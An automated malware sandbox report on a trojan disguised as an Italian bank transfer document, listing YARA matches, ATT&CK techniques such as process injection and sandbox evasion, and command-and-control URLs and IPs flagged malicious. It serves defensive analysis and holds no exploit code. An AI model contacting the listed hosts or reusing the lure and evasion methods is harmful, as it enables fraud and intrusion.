          Source: Yara match; File source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
          | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 512 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 213 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 241 Security Software Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Rootkit | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
          | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Masquerading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
          | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 41 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
          | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 512 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
          [Behavior graph: ID 1460774; Sample: Documento di bonifico banca...; Startdate: 21/06/2024; Architecture: WINDOWS; Score: 100]

          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | 79% | ReversingLabs | Win32.Trojan.Znyonm | |
          | Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | 100% | Joe Sandbox ML | | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
                                • Avira URL Cloud: safe
                                unknown
                                https://buy.live.com/explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.4hu259.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://login.microsoftonline.coexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://www.surejobzapp.com/pz12/www.xiangadvanced.siteexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.hemophilia-treatment-41433.bondReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://outlook.comexplorer.exe, 00000007.00000003.3082354103.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3771486078.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2192144452.0000000008903000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ombak99.lolexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.xiangadvanced.site/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ainth.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.loyalbahis356.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-ifexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.surejobzapp.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.xiangadvanced.siteexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.paucanyes.com/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.shuaninvolved.site/pz12/www.cripmz.xyzexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.meidupro.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000007.00000002.3770457753.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.000000000866C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://passwordreset.microsexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://account.activedirectory.explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.meidupro.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cripmz.xyz/pz12/www.meidupro.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sxybet88.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jnhdh8827.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.shuaninvolved.site/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.microexplorer.exe, 00000007.00000002.3770057054.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1360029005.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3769349674.0000000007320000.00000002.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.4hu259.com/pz12/www.vanessasmobilespa.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://tempuri.org/DataSet1.xsd;PleaseDocumento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                https://wns.windows.com/EM0explorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ebehemin.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.vanessasmobilespa.com/pz12/www.surejobzapp.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ainth.com/pz12/www.motchillssss.topexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.motchillssss.topReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://android.notify.windows.com/iOSdXexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-scholaexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.vanessasmobilespa.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ebehemin.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.vanessasmobilespa.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://account.liexplorer.exe, 00000007.00000000.1379438012.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2199512459.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3775303278.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.surejobzapp.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.xiangadvanced.siteReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sxybet88.com/pz12/explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.xiangadvanced.site/pz12/www.ebehemin.comexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.hemophilia-treatment-41433.bondexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ombak99.lol/pz12/www.shuaninvolved.siteexplorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.paucanyes.comReferer:explorer.exe, 00000007.00000003.2191969576.000000000BF52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3777293981.000000000BF44000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000007.00000002.3768370423.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1362225789.000000000695E000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | www.sxybet88.com | European Union | 13335 | CLOUDFLARENETUS | true
185.53.179.92 | www.hemophilia-treatment-41433.bond | Germany | 61969 | TEAMINTERNET-ASDE | true
188.114.96.3 | www.jnhdh8827.com | European Union | 13335 | CLOUDFLARENETUS | true
185.148.106.71 | www.loyalbahis356.com | Russian Federation | 201341 | TESONETLT | false
172.67.158.16 | www.motchillssss.top | United States | 13335 | CLOUDFLARENETUS | true
103.169.142.0 | www.paucanyes.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
192.64.118.107 | ombak99.lol | United States | 22612 | NAMECHEAP-NETUS | true
3.64.163.50 | www.ainth.com | United States | 16509 | AMAZON-02US | true
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1460774
                                Start date and time:2024-06-21 16:13:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 12m 27s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@13/7@10/8
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 202
                                • Number of non-executed functions: 284
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
Time | Type | Description
10:14:06 | API Interceptor | 1x Sleep call for process: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe modified
10:14:11 | API Interceptor | 11x Sleep call for process: powershell.exe modified
10:14:19 | API Interceptor | 8517242x Sleep call for process: explorer.exe modified
10:14:55 | API Interceptor | 7937603x Sleep call for process: control.exe modified
                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                No context
                                No context
                                Process:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\explorer.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1022
                                Entropy (8bit):5.202351927401395
                                Encrypted:false
                                SSDEEP:24:YqHZ6T06MhmQvmmb0O0bihmIqvmm6CUXyhmfJgvmmbxdB6hmxvmmz0JahmsvmmbE:YqHZ6T06McFmb0O0bicIjmDUXycR1mb2
                                MD5:3339D6EDF001A2971486F3EAF39F0476
                                SHA1:1F7E104E89EC728EDF3488EB66B5E97F2B32708F
                                SHA-256:547E26B6B9B96A8F2C813F8C37DD731CC8D4CF0FEA5A6006DD1E302DCC4EFB19
